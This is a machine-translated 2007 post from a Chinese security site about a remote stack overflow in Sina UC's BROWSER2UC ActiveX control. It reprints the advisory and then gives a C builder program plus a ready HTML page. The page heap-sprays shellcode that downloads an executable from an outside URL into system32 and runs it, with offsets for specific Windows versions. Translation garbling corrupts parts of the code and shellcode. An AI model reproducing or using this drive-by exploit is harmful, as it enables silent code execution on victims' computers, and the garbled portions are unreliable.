Sina UC 2 0 0 6 Activex SendChatRoomOpt Exploit-vulnerability warning-the black bar safety net

2007-01-10T00:00:00
ID MYHACK58:62200713690
Type myhack58
Reporter 佚名
Modified 2007-01-10T00:00:00

Description

Ghost boy: I compile, download address: ! [](http://www.huaidan.org/blog/styles/default/images/icon_file.gif) 2007011012544.rar

Source: Ph4nt0m

////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Sina UC ActiveX multiple remote stack overflow vulnerability // // Sowhat of Nevis Labs // Date: 2007.01.09 // // http://www.nevisnetworks.com // http://secway.org/advisory/20070109EN.txt // http://secway.org/advisory/20070109CN.txt // // CVE: no // // Vendors // // Sina Inc. // // Affected versions: // Sina UC <=UC2006 // // Overview: // Sina UC is in China very popular IM tool // // http://www.51uc.com // // Details: // // The vulnerability is caused by the Sina UC a plurality of ActiveX controls the parameters of the lack of necessary authentication, the attacker constructs a malicious Web page, you can remotely take complete control of the installation Sina UC // The user's computer, // // Multiple controls for the presence of stack overflow questions, including but not limited to: // // 1. clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384 // C:\Program Files\sina\UC\ActiveX\BROWSER2UC.dll // // Sub SendChatRoomOpt ( // ByVal astrVerion As String , // ByVal astrUserID As String , // ByVal asDataType As Integer , // ByVal alTypeID As Long // ) // // When the 1st parameter is a super-string, the occurrence of stack overflows, SEH is overwritten, an attacker can execute arbitrary code //////////////////////////////////////////////////////////////////////////////////////////////////////////////

////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Sina UC 2 0 0 6 Activex SendChatRoomOpt Trojan // Code by cloud Shu & LuoLuo,ph4nt0morg //////////////////////////////////////////////////////////////////////////////////////////////////////////////

include <stdio. h>

include <stdlib. h>

include <windows. h>

include <string. h>

FILE fp = NULL; char file = "fuck_uc.html"; char *url = NULL;

unsigned char sc[] = "\x60\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x70" "\x08\x81\xec\x00\x04\x00\x00\x8b\xec\x56\x68\x8e\x4e\x0e\xec\xe8" "\xff\x00\x00\x00\x89\x45\x04\x56\x68\x98\xfe\x8a\x0e\xe8\xf1\x00" "\x00\x00\x89\x45\x08\x56\x68\x25\xb0\xff\xc2\xe8\the XE3\x00\x00\x00" "\x89\x45\x0c\x56\x68\xef\xce\xe0\x60\xe8\xd5\x00\x00\x00\x89\x45" "\x10\x56\x68\xc1\x79\xe5\xb8\xe8\xc7\x00\x00\x00\x89\x45\x14\x40" "\x80\x38\xc3\x75\xfa\x89\x45\x18\xe9\x08\x01\x00\x00\x5e\x89\x75" "\x24\x8b\x45\x04\x6a\x01\x59\x8b\x55\x18\x56\xe8\x8c\x00\x00\x00" "\x50\x68\x36\x1a\x2f\x70\xe8\x98\x00\x00\x00\x89\x45\x1c\x8b\xc5" "\x83\xc0\x50\x89\x45\x20\x68\xff\x00\x00\x00\x50\x8b\x45\x14\x6a" "\x02\x59\x8b\x55\x18\xe8\x62\x00\x00\x00\x03\x45\x20\xc7\x00\x5c" "\x7e\x2e\x65\xc7\x40\x04\x78\x65\x00\x00\xff\x75\x20\x8b\x45\x0c" "\x6a\x01\x59\x8b\x55\x18\xe8\x41\x00\x00\x00\x6a\x07\x58\x03\x45" "\x24\x33\xdb\x53\x53\xff\x75\x20\x50\x53\x8b\x45\x1c\x6a\x05\x59" "\x8b\x55\x18\xe8\x24\x00\x00\x00\x6a\x00\xff\x75\x20\x8b\x45\x08" "\x6a\x02\x59\x8b\x55\x18\xe8\x11\x00\x00\x00\x81\xc4\x00\x04\x00" "\x00\x61\x81\xc4\xdc\x04\x00\x00\x5d\xc2\x24\x00\x41\x5b\x52\x03" "\xe1\x03\xe1\x03\xe1\x03\xe1\x83\xec\x04\x5a\x53\x8b\xda\xe2\xf7" "\x52\xff\xe0\x55\x8b\xec\x8b\x7d\x08\x8b\x5d\x0c\x56\x8b\x73\x3c" "\x8b\x74\x1e\x78\x03\xf3\x56\x8b\x 76\x20\x03\xf3\x33\xc9\x49\x41" "\xad\x03\xc3\x56\x33\xf6\x0f\xbe\x10\x3a\xf2\x74\x08\xc1\xce\x0d" "\x03\xf2\x40\xeb\xf1\x3b\xfe\x5e\x75\xe5\x5a\x8b\xeb\x8b\x5a\x24" "\x03\xdd\x66\x8b\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5" "\x5e\x5d\xc2\x08\x00\xe8\xf3\xfe\xff\xff\x55\x52\x4c\x4d\x4f\x4e" "\x00";

char * header = "<!--\ n" "clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384\n" "C:\\Program Files\\sina\\UC\\ActiveX\\BROWSER2UC. dll\n\n"

"Sub SendChatRoomOpt (\n" "ByVal astrVerion As String ,\n" "ByVal astrUserID As String ,\n" "ByVal asDataType As Integer ,\n" "ByVal alTypeID As Long\n" ")\n\n" "ph4nt0m.org, Code By the cloud Shu & LuoLuo\n" "!--& gt;\n\n" "<html>\n" "<head>\n" "<script language=\"javascript\">\n" "var heapSprayToAddress = 0x0c0c0c0c;\n" "var shellcode = unescape(\"%u9090\"+\"%u9 0 9 0\"+ \n";

char * footer = "\n" "var heapBlockSize = 0x100000;\n" "var payLoadSize = shellcode. length * 2;\n" "var spraySlideSize = heapBlockSize - (payLoadSize+0x38);\n" "var spraySlide = unescape(\"%u9090%u9090\");\n\n" "spraySlide = getSpraySlide(spraySlide,spraySlideSize);\n" "heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;\n" "memory = new Array();\n\n" "for (i=0;i<heapBlocks;i++)\n{\n" "\t\tmemory[i] = spraySlide + shellcode;\n}\n"

"function getSpraySlide(spraySlide, spraySlideSize)\n{\n\t" "while (spraySlide. length*2<spraySlideSize)\n\t" "{\n\t\tspraySlide += spraySlide;\n\t}\n" "\tspraySlide = spraySlide. substring(0,spraySlideSize/2);\n\treturn spraySlide;\n}\n\n";

// print unicode shellcode void PrintPayLoad(char lpBuff, int buffsize) { int i; for(i=0;i < buffsize;i+=2) { if((i%1 6)==0) { if(i!= 0) { fprintf(fp, "%s", "\" +\n\""); } else { fprintf(fp, "%s", "\""); } } fprintf(fp, "%%u%0.4 x",((unsigned short)lpBuff)[i/2]); } //Put the shellcode to print in the header behind, then use the " ) " closed fprintf(fp, "%s", "\");\n"); }

int main( int argc, char *argv[] ) { if( argc != 3 ) { printf( "\nUC ActiveX object exp,Code by the cloud Shu & LuoLuo,ph4nt0morg\n" ); printf( "Usage: %s <url> <os>\n", argv[0] ); printf( "1 Windows XP SP2 Chinese version,IE 6\n" ); printf( "2 Windows 2 0 0 3 standard SP1 Chinese Version, IE 6\n" );

return -1; }

char seh[1 0 2 4] = { 0 }; int os = atoi( argv[2] ); int len = 0;

if( os == 1 ) { len = 3 1 3 3; } else if( os == 2 ) { len = 3 1 9 3; }

sprintf( seh , "var obj = new ActiveXObject(\"BROWSER2UC. BROWSERToUC\");\n\tvar arg1;\n\n<!-- Windows 2003 standard SP1 + IE 6 here cover the length of i is 3 1 9 3 -->\n<!-- Windows XP SP2 + IE6 here to cover the length of i is 3 1 3 3 -->\n\nfor( var i = 0; i < %d; i ++ )\n{\targ1 += \"A\";\n}arg1=arg1 + unescape(\"%%0c%%0c%%0c%%0c\");\narg2=\"defaultV\";\narg3=1;\narg4=1;\nobj. SendChatRoomOpt(arg1 ,arg2 ,arg3 ,arg4);\n</script>\n</head>\n</html>", len );

url = argv[1]; if( (! strstr(url, "http://") && ! strstr(url, "ftp://")) || strlen(url) < 1 0) { printf("[-] Invalid url. Must start with 'http://','ftp://'\n"); return -1; }

printf("[+] download url:%s\n", url);

fp = fopen( file , "w" ); if( fp == NULL ) { printf( "Create file error: %d\n", GetLastError() ); return -1; } fprintf( fp, "%s", header ); fflush( fp );

char buffer[4 0 9 6] = { 0 }; int sc_len = sizeof(sc)-1; memcpy(buffer, sc, sc_len); memcpy(buffer+sc_len, url, strlen(url));

sc_len += strlen(url)+1; PrintPayLoad((char *)buffer, sc_len); fflush( fp );

fprintf( fp, "%s", footer ); fprintf( fp, "%s", seh );

fflush( fp ); fclose( fp );

printf( "Create done! please look for %s\n", file ); }

UC BROWSER2UC. dll overflow demo code Today and LuoLuo the test, wrote the test code. The web page will download my blog.<http://icylife.net/1.exe this is the Notepad, the download to the system32 saved as~. exe and run in the background. Builder the evening and then write ha, I am hungry.>

This we tested <!-- Windows 2003 standard SP1 + IE 6 here cover the length of i is 3 1 9 3 --> <!-- Windows XP SP2 + IE6 here to cover the length of i is 3 1 3 3 -->

But IE7 also can not use in the evening plus through the JS determine the type of system part, so that you do not modify the value of i, now for the system need to be modified.

<!--

1. clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384 C:Program FilessinaUCActiveXBROWSER2UC.dll

Sub SendChatRoomOpt ( ByVal astrVerion As String , ByVal astrUserID As String , ByVal asDataType As Integer , ByVal alTypeID As Long )

Code By the cloud Shu & LuoLuo ! -->

<html> <head> <script language="javascript"> var heapSprayToAddress = 0x0c0c0c0c; var shellcode = unescape("%u9090"+"%u9090"+ "%u6460%u30a1%u0000%u8b00%u0c40%u708b%uad1c%u708b" + "%u8108%u00ec%u0004%u8b00%u56ec%u8e68%u0e4e%ue8ec" + "%u00ff%u0000%u4589%u5604%u9868%u8afe%ue80e%u00f1" + "%u0000%u4589%u5608%u2568%uffb0%ue8c2%u00e3%u0000" + "%u4589%u560c%uef68%ue0ce%ue860%u00d5%u0000%u4589" + "%u5610%uc168%ue579%ue8b8%u00c7%u0000%u4589%u4014" + "%u3880%u75c3%u89fa%u1845%u08e9%u0001%u5e00%u7589" + "%u8b24%u0445%u016a%u8b59%u1855%ue856%u008c%u0000" + "%u6850%u1a36%u702f%u98e8%u0000%u8900%u1c45%uc58b" + "%uc083%u8950%u2045%uff68%u0000%u5000%u458b%u6a14" + "%u5902%u558b%ue818%u0062%u0000%u4503%uc720%u5c00" + "%u2e7e%uc765%u0440%u6578%u0000%u75ff%u8b20%u0c45" + "%u016a%u8b59%u1855%u41e8%u0000%u6a00%u5807%u4503" + "%u3324%u53db%uff53%u2075%u5350%u458b%u6a1c%u5905" + "%u558b%ue818%u0024%u0000%u006a%u75ff%u8b20%u0845" + "%u026a%u8b59%u1855%u11e8%u0000%u8100%u00c4%u0004" + "%u6100%uc481%u04dc%u0000%uc25d%u0024%u5b41%u0352" + "%u03e1%u03e1%u03e1%u83e1%u04ec%u535a%uda8b%uf7e2" + "%uff52%u55e0%uec8b%u7d8b%u8b08%u0c5d%u8b56%u3c73" + "%u748b%u781e%uf303%u8b56%u2076%uf303%uc933%u4149" + "%u03ad%u56c3%uf633%ube0f%u3a10%u74f2%uc108%u0dce" + "%uf203%ueb40%u3bf1%u5efe%ue575%u8b5a%u8beb%u245a" + "%udd03%u8b66%u4b0c%u5a8b%u031c%u8bdd%u8b04%uc503" + "%u5d5e%u08c2%ue800%ufef3%uffff%u5255%u4d4c%u4e4f" + "%u6800%u7474%u3a70%u2f2f%u6369%u6c79%u6669%u2e65" + "%u656e%u2f74%u2e31%u7865%u0065");

var heapBlockSize = 0x100000; var payLoadSize = shellcode. length * 2; var spraySlideSize = heapBlockSize - (payLoadSize+0x38); var spraySlide = unescape("%u9090%u9090"); spraySlide = getSpraySlide(spraySlide,spraySlideSize); heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize; memory = new Array();

for (i=0;i<heapBlocks;i++) { memory[i] = spraySlide + shellcode; } function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide. length*2<spraySlideSize) { spraySlide += spraySlide; } spraySlide = spraySlide. substring(0,spraySlideSize/2); return spraySlide; }

var obj = new ActiveXObject("BROWSER2UC. BROWSERToUC"); var arg1;

<!-- Windows 2003 standard SP1 + IE 6 here cover the length of i is 3 1 9 3 --> <!-- Windows XP SP2 + IE6 here to cover the length of i is 3 1 3 3 --> for( var i = 0; i < 3 1 3 3; i ++ ) { arg1 += "A"; }

arg1=arg1 + unescape("%0c%0c%0c%0c"); arg2="defaultV"; arg3=1; arg4=1; obj. SendChatRoomOpt(arg1 ,arg2 ,arg3 ,arg4); </script> </head> </html>